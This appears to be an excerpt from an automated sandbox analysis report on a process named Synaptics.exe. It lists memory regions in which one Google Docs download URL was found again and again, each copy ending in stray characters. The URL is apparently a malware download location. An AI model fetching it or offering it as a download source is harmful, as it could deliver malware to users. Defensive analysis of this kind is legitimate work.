                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle0
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleD
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleI
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleb
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen2
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenH
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenN
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetleng
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlenr
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlep
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfA
                                Source: Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfo
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg-
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg7
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-a
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-E
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhW
                                Source: Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe~
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhromeF
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhts-cn.net
                                Source: Synaptics.exe, 00000008.00000002.3080344840.0000000035B7E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhw
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadied
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloading.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.y
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiz
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj6r6
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjf
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk)
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk3
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk6
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlef
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme?
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlemeV
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlemet
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni9
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni=
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniT
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniyq
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllem
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemP
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme#
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme%
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme;
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemeJ
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemeL
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadllemez
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlvingD
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmM
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadming
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmooo.
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026291010.00000000075FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadname
                                Source: Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaq
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncel
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelA
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelG
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelQ
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelY
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell/
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncell8
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadncelu
